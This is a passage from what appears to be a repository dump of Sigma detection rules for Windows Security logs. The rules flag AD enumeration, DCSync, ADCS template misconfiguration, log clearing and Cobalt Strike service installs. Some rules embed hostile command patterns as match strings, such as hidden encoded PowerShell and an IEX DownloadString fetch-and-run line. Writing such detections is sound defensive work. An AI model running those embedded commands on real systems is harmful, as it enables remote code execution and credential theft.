    "content": "title: AD Privileged Users or Groups Reconnaissance\nid: 35ba1d85-724d-42a3-889f-2e2362bcaf23\nstatus: test\ndescription: Detects reconnaissance of privileged users or groups based on event ID 4661 and the SIDs of known privileged users and groups\nreferences:\n    - https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2022-07-13\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: enable Object Access SAM on your Domain Controllers'\ndetection:\n    selection:\n        EventID: 4661\n        ObjectType:\n            - 'SAM_USER'\n            - 'SAM_GROUP'\n    selection_object:\n        - ObjectName|endswith:\n              - '-512' # Domain Admins\n              - '-502' # krbtgt\n              - '-500' # Administrator\n              - '-505'\n              - '-519' # Enterprise Admins\n              - '-520' # Group Policy Creator Owners\n              - '-544' # Administrators\n              - '-551' # Backup Operators\n              - '-555' # Remote Desktop Users\n        - ObjectName|contains: 'admin'\n    filter:\n        SubjectUserName|endswith: '$'\n    condition: selection and selection_object and not filter\nfalsepositives:\n    - If the source account name is not an admin, it's highly suspicious\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_ad_object_writedac_access.yml",
    "content": "title: AD Object WriteDAC Access\nid: 028c7842-4243-41cd-be6f-12f3cf1a26c7\nstatus: test\ndescription: Detects WRITE_DAC access to a domain object\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html\n    - https://threathunterplaybook.com/library/windows/active_directory_replication.html\n    - https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-09-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1222.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        ObjectServer: 'DS'\n        AccessMask: '0x40000'\n        ObjectType:\n            - '19195a5b-6da0-11d0-afd3-00c04fd930c9'\n            - 'domainDNS'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml",
    "content": "title: Active Directory Replication from Non Machine Account\nid: 17d619c1-e020-4347-957e-1d1207455c93\nstatus: test\ndescription: Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html\n    - https://threathunterplaybook.com/library/windows/active_directory_replication.html\n    - https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-07-26\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.006\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        AccessMask: '0x100'\n        Properties|contains:\n            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'\n            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'\n            - '89e95b76-444d-4c62-991a-0facbeda640c'\n    filter:\n        - SubjectUserName|endswith: '$'\n        - SubjectUserName|startswith: 'MSOL_' # https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/reference-connect-accounts-permissions#ad-ds-connector-account\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_ad_user_enumeration.yml",
    "content": "title: Potential AD User Enumeration From Non-Machine Account\nid: ab6bffca-beff-4baa-af11-6733f296d57a\nstatus: test\ndescription: Detects read access to a domain user from a non-machine account\nreferences:\n    - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\n    - http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html\n    - https://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662\nauthor: Maxime Thiebaut (@0xThiebaut)\ndate: 2020-03-30\nmodified: 2022-11-08\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The \"Read all properties\" permission on the user object needs to be audited for the \"Everyone\" principal'\ndetection:\n    selection:\n        EventID: 4662\n        # Using contains as the data commonly is structured as \"%{bf967aba-0de6-11d0-a285-00aa003049e2}\"\n        # The user class (https://learn.microsoft.com/en-us/windows/win32/adschema/c-user)\n        ObjectType|contains: 'bf967aba-0de6-11d0-a285-00aa003049e2'\n        AccessMask|endswith:\n            # Note: Since the Access Mask can hold more than one permission, we need to list every value of the second-lowest hex digit that has the \"Read Property\" bit (0x10) set\n            - '1?' # Read Property (alone or with low-nibble rights only)\n            - '3?' # Read Property + Write Property\n            - '5?' # Read Property + Delete Tree\n            - '7?' # Read Property + Write Property + Delete Tree\n            - '9?' # Read Property + List Object\n            - 'B?' # Read Property + Write Property + List Object\n            - 'D?' # Read Property + Delete Tree + List Object\n            - 'F?' # Read Property + Write Property + Delete Tree + List Object\n    filter_main_machine_accounts:\n        SubjectUserName|endswith: '$' # Exclude machine accounts\n    filter_main_msql:\n        SubjectUserName|startswith: 'MSOL_' # https://learn.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrators configuring new users.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml",
    "content": "title: ADCS Certificate Template Configuration Vulnerability\nid: 5ee3a654-372f-11ec-8d3d-0242ac130003\nstatus: test\ndescription: Detects certificate template loading or update events where the template allows the enrollee to supply the subject, a risky permission\nreferences:\n    - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf\nauthor: Orlinum, BlueDefenZer\ndate: 2021-11-17\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\nlogsource:\n    product: windows\n    service: security\n    definition: Certificate Services loading a template triggers event ID 4898 and a Certificate Services template update triggers event ID 4899. The risky permission is present when the template contains the specific flag.\ndetection:\n    selection1:\n        EventID: 4898\n        TemplateContent|contains: 'CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'\n    selection2:\n        EventID: 4899\n        NewTemplateContent|contains: 'CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'\n    condition: selection1 or selection2\nfalsepositives:\n    - Administrator activity\n    - Proxy SSL certificate with subject modification\n    - Smart card enrollment\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml",
    "content": "title: ADCS Certificate Template Configuration Vulnerability with Risky EKU\nid: bfbd3291-de87-4b7c-88a2-d6a5deb28668\nstatus: test\ndescription: Detects certificate template loading or update events where the template allows the enrollee to supply the subject (a risky permission) and carries a risky EKU\nreferences:\n    - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf\nauthor: Orlinum, BlueDefenZer\ndate: 2021-11-17\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\nlogsource:\n    product: windows\n    service: security\n    definition: Certificate Services loading a template triggers event ID 4898 and a Certificate Services template update triggers event ID 4899. The risky permission is present when the template contains the specific flag together with a risky EKU.\ndetection:\n    selection10:\n        EventID: 4898\n        TemplateContent|contains:\n            - '1.3.6.1.5.5.7.3.2' # Client Authentication\n            - '1.3.6.1.5.2.3.4' # PKINIT Client Authentication\n            - '1.3.6.1.4.1.311.20.2.2' # Smart Card Logon\n            - '2.5.29.37.0' # Any Purpose\n    selection11:\n        TemplateContent|contains: 'CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'\n\n    selection20:\n        EventID: 4899\n        NewTemplateContent|contains:\n            - '1.3.6.1.5.5.7.3.2' # Client Authentication\n            - '1.3.6.1.5.2.3.4' # PKINIT Client Authentication\n            - '1.3.6.1.4.1.311.20.2.2' # Smart Card Logon\n            - '2.5.29.37.0' # Any Purpose\n    selection21:\n        NewTemplateContent|contains: 'CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT'\n\n    condition: (selection10 and selection11) or (selection20 and selection21)\nfalsepositives:\n    - Administrator activity\n    - Proxy SSL certificate with subject modification\n    - Smart card enrollment\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_add_remove_computer.yml",
    "content": "title: Add or Remove Computer from DC\nid: 20d96d95-5a20-4cf1-a483-f3bda8a7c037\nstatus: test\ndescription: Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743\nauthor: frack113\ndate: 2022-10-14\ntags:\n    - attack.defense-evasion\n    - attack.t1207\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 4741\n            - 4743\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_admin_share_access.yml",
    "content": "title: Access To ADMIN$ Network Share\nid: 098d7118-55bc-4912-a836-dc6483a8d150\nstatus: test\ndescription: Detects access to ADMIN$ network share\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-04\nmodified: 2024-01-16\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The advanced audit policy setting \"Object Access > Audit File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5140\n        ShareName: 'Admin$'\n    filter_main_computer_account:\n        SubjectUserName|endswith: '$'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml",
    "content": "title: Enabled User Right in AD to Control User Objects\nid: 311b6ce2-7890-4383-a8c2-663a9f6b43cd\nstatus: test\ndescription: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.\nreferences:\n    - https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/\nauthor: '@neu5ron'\ndate: 2017-07-30\nmodified: 2021-12-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Policy Change\\Audit Authorization Policy Change'\ndetection:\n    selection_base:\n        EventID: 4704\n    selection_keywords:\n        PrivilegeList|contains: 'SeEnableDelegationPrivilege'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml",
    "content": "title: Active Directory User Backdoors\nid: 300bac00-e041-4ee2-9c36-e262656a6ecc\nstatus: test\ndescription: Detects scenarios where one can control another user's or computer's account without having to use their credentials.\nreferences:\n    - https://msdn.microsoft.com/en-us/library/cc220234.aspx\n    - https://adsecurity.org/?p=3466\n    - https://blog.harmj0y.net/redteaming/another-word-on-delegation/\nauthor: '@neu5ron'\ndate: 2017-04-13\nmodified: 2024-02-26\ntags:\n    - attack.privilege-escalation\n    - attack.t1098\n    - attack.persistence\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Account Management\\Audit User Account Management, DS Access > Audit Directory Service Changes, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\DS Access\\Audit Directory Service Changes'\ndetection:\n    selection1:\n        EventID: 4738\n    filter_empty:\n        AllowedToDelegateTo:\n            - ''\n            - '-'\n    filter_null:\n        AllowedToDelegateTo: null\n    selection_5136_1:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'msDS-AllowedToDelegateTo'\n    selection_5136_2:\n        EventID: 5136\n        ObjectClass: 'user'\n        AttributeLDAPDisplayName: 'servicePrincipalName'\n    selection_5136_3:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'msDS-AllowedToActOnBehalfOfOtherIdentity'\n    condition: (selection1 and not 1 of filter_*) or 1 of selection_5136_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml",
    "content": "title: Weak Encryption Enabled and Kerberoast\nid: f6de9536-0441-4b3f-a646-f4e00f300ffd\nstatus: test\ndescription: Detects a scenario where weak encryption is enabled for a user profile, which could be used for hash/password cracking.\nreferences:\n    - https://adsecurity.org/?p=2053\n    - https://blog.harmj0y.net/redteaming/another-word-on-delegation/\nauthor: '@neu5ron'\ndate: 2017-07-30\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Account Management\\Audit User Account Management'\ndetection:\n    selection:\n        EventID: 4738\n    # According to Microsoft, the bit values are listed here: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4720\n    # However, that seems to be a simple copy from https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/useraccountcontrol-manipulate-account-properties\n    # and the actual flags that are used are quite different and, unfortunately, not documented.\n    # https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/ contains a number of EVTX files with relevant events, which can be used to extract\n    # the following values.\n    olduac_des: # 0x8000\n        OldUacValue|endswith:\n            - 8???\n            - 9???\n            - A???\n            - B???\n            - C???\n            - D???\n            - E???\n            - F???\n    newuac_des:\n        NewUacValue|endswith:\n            - 8???\n            - 9???\n            - A???\n            - B???\n            - C???\n            - D???\n            - E???\n            - F???\n    olduac_preauth: # 0x10000\n        OldUacValue|endswith:\n            - 1????\n            - 3????\n            - 5????\n            - 7????\n            - 9????\n            - B????\n            - D????\n            - F????\n    newuac_preauth:\n        NewUacValue|endswith:\n            - 1????\n            - 3????\n            - 5????\n            - 7????\n            - 9????\n            - B????\n            - D????\n            - F????\n    olduac_encrypted: # 0x800\n        OldUacValue|endswith:\n            - 8??\n            - 9??\n            - A??\n            - B??\n            - C??\n            - D??\n            - E??\n            - F??\n    newuac_encrypted:\n        NewUacValue|endswith:\n            - 8??\n            - 9??\n            - A??\n            - B??\n            - C??\n            - D??\n            - E??\n            - F??\n    condition: selection and ((newuac_des and not olduac_des) or (newuac_preauth and not olduac_preauth) or (newuac_encrypted and not olduac_encrypted))\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_alert_ruler.yml",
    "content": "title: Hacktool Ruler\nid: 24549159-ac1b-479c-8175-d42aea947cae\nstatus: test\ndescription: Detects events that are generated when using the hacktool Ruler by Sensepost\nreferences:\n    - https://github.com/sensepost/ruler\n    - https://github.com/sensepost/ruler/issues/47\n    - https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-31\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.execution\n    - attack.collection\n    - attack.lateral-movement\n    - attack.t1087\n    - attack.t1114\n    - attack.t1059\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4776\n        Workstation: 'RULER'\n    selection2:\n        EventID:\n            - 4624\n            - 4625\n        WorkstationName: 'RULER'\n    condition: (1 of selection*)\nfalsepositives:\n    - Go utilities that use staaldraad's awesome NTLM library\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_atsvc_task.yml",
    "content": "title: Remote Task Creation via ATSVC Named Pipe\nid: f6de6525-4509-495a-8a82-1f8b0ed73a00\nstatus: test\ndescription: Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe\nreferences:\n    - https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2024-08-01\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.lateral-movement\n    - attack.persistence\n    - car.2013-05-004\n    - car.2015-04-001\n    - attack.t1053.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName: atsvc\n        AccessList|contains: 'WriteData'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_audit_log_cleared.yml",
    "content": "title: Security Eventlog Cleared\nid: d99b79d2-0a6f-4f46-ad8b-260b6e17f982\nrelated:\n    - id: f2f01843-e7b8-4f95-a35a-d23584476423\n      type: obsolete\n    - id: a122ac13-daf8-4175-83a2-72c387be339d\n      type: obsolete\nstatus: test\ndescription: One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution\nreferences:\n    - https://twitter.com/deviouspolack/status/832535435960209408\n    - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-01-10\nmodified: 2022-02-24\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\n    - car.2016-04-002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_517:\n        EventID: 517\n        Provider_Name: Security\n    selection_1102:\n        EventID: 1102\n        Provider_Name: Microsoft-Windows-Eventlog\n    condition: 1 of selection_*\nfalsepositives:\n    - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)\n    - System provisioning (system reset before the golden image creation)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_camera_microphone_access.yml",
    "content": "title: Processes Accessing the Microphone and Webcam\nid: 8cd538a4-62d5-4e83-810b-12d41e428d6e\nstatus: test\ndescription: Potential adversaries accessing the microphone and webcam in an endpoint.\nreferences:\n    - https://twitter.com/duzvik/status/1269671601852813320\n    - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-07\nmodified: 2021-11-27\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4657\n            - 4656\n            - 4663\n        ObjectName|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged'\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\NonPackaged'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml",
    "content": "title: CobaltStrike Service Installations - Security\nid: d7a95147-145f-4678-b85d-d1ff4a3bb3f6\nrelated:\n    - id: 5a105d34-05fc-401e-8553-272b45c1522d\n      type: derived\nstatus: test\ndescription: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement\nreferences:\n    - https://www.sans.org/webcasts/119395\n    - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/\n    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nauthor: Florian Roth (Nextron Systems), Wojciech Lesicki\ndate: 2021-05-26\nmodified: 2022-11-27\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory needs to be enabled to log the EID 4697\ndetection:\n    event_id:\n        EventID: 4697\n    selection1:\n        ServiceFileName|contains|all:\n            - 'ADMIN$'\n            - '.exe'\n    selection2:\n        ServiceFileName|contains|all:\n            - '%COMSPEC%'\n            - 'start'\n            - 'powershell'\n    selection3:\n        ServiceFileName|contains: 'powershell -nop -w hidden -encodedcommand'\n    selection4:\n        ServiceFileName|base64offset|contains: \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:\"\n    condition: event_id and 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml",
    "content": "title: Failed Code Integrity Checks\nid: 470ec5fa-7b4e-4071-b200-4c753100f49b\nstatus: stable\ndescription: |\n    Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281\nauthor: Thomas Patzke\ndate: 2019-12-03\nmodified: 2025-01-19\ntags:\n    - attack.defense-evasion\n    - attack.t1027.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 5038\n            - 6281\n    filter_optional_crowdstrike:\n        param1|contains:\n            - '\\CSFalconServiceUninstallTool_'\n            - '\\Program Files\\CrowdStrike\\'\n            - '\\System32\\drivers\\CrowdStrike\\'\n            - '\\Windows\\System32\\ScriptControl64_'\n    filter_optional_sophos:\n        param1|contains: '\\Program Files\\Sophos\\'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Disk device errors\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml",
    "content": "title: DCERPC SMB Spoolss Named Pipe\nid: 214e8f95-100a-4e04-bb31-ef6cba8ce07e\nstatus: test\ndescription: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.\nreferences:\n    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n    - https://dirkjanm.io/a-different-way-of-abusing-zerologon/\n    - https://twitter.com/_dirkjan/status/1309214379003588608\nauthor: OTR (Open Threat Research)\ndate: 2018-11-28\nmodified: 2022-08-11\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName: spoolss\n    condition: selection\nfalsepositives:\n    - 'Domain Controllers acting as printer servers too? :)'\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml",
    "content": "title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Security\nid: c39f0c81-7348-4965-ab27-2fde35a1b641\nstatus: test\ndescription: Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)\ndate: 2020-10-12\nmodified: 2022-11-26\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1021.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        RelativeTargetName|endswith: '\\Internet Explorer\\iertutil.dll'\n    filter:\n        SubjectUserName|endswith: '$'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dcsync.yml",
    "content": "title: Mimikatz DC Sync\nid: 611eab06-a145-4dfa-a295-3ccc5c20f59a\nstatus: test\ndescription: Detects Mimikatz DC sync security events\nreferences:\n    - https://twitter.com/gentilkiwi/status/1003236624925413376\n    - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2\n    - https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662\nauthor: Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu\ndate: 2018-06-03\nmodified: 2022-04-26\ntags:\n    - attack.credential-access\n    - attack.s0002\n    - attack.t1003.006\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        Properties|contains:\n            - 'Replicating Directory Changes All'\n            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'\n            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'\n            - '9923a32a-3607-11d2-b9be-0000f87a36b2'\n            - '89e95b76-444d-4c62-991a-0facbeda640c'\n        AccessMask: '0x100'\n    filter1:\n        SubjectDomainName: 'Window Manager'\n    filter2:\n        SubjectUserName|startswith:\n            - 'NT AUT'\n            - 'MSOL_'\n    filter3:\n        SubjectUserName|endswith: '$'\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Valid DC Sync that is not covered by the filters; please report\n    - Local Domain Admin account used for Azure AD Connect\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_default_domain_gpo_modification.yml",
    "content": "title: Windows Default Domain GPO Modification\nid: e5ac86dd-2da1-454b-be74-05d26c769d7d\nrelated:\n    - id: dcff7e85-d01f-4eb5-badd-84e2e6be8294\n      type: similar\nstatus: experimental\ndescription: |\n    Detects modifications to Default Domain or Default Domain Controllers Group Policy Objects (GPOs).\n    Adversaries may modify these default GPOs to deploy malicious configurations across the domain.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\n    - https://adsecurity.org/?p=3377\n    - https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/\n    - https://jgspiers.com/audit-group-policy-changes/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    product: windows\n    service: security\n    definition: |\n        Enable 'Audit Directory Service Changes' in the Default Domain Controllers Policy under:\n        Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Audit Policies -> DS Access -> Audit Directory Service Changes (Success).\n        Additionally, proper SACL needs to be configured on the 'CN=Policies,CN=System,DC=<domain>,DC=<tld>' container in Active Directory to capture changes to Group Policy Objects.\ndetection:\n    selection:\n        EventID: 5136\n        ObjectClass: 'groupPolicyContainer'\n        ObjectDN|startswith:\n            - 'CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=POLICIES,CN=SYSTEM' # Default Domain Policy\n            - 'CN={6AC1786C-016F-11D2-945F-00C04FB984F9},CN=POLICIES,CN=SYSTEM' # Default Domain Controllers Policy\n    condition: selection\nfalsepositives:\n    - Legitimate modifications to Default Domain or Default Domain Controllers GPOs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_device_installation_blocked.yml",
    "content": "title: Device Installation Blocked\nid: c9eb55c3-b468-40ab-9089-db2862e42137\nstatus: test\ndescription: Detects an installation of a device that is forbidden by the system policy\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423\nauthor: frack113\ndate: 2022-10-14\ntags:\n    - attack.initial-access\n    - attack.t1200\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID: 6423\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_disable_event_auditing.yml",
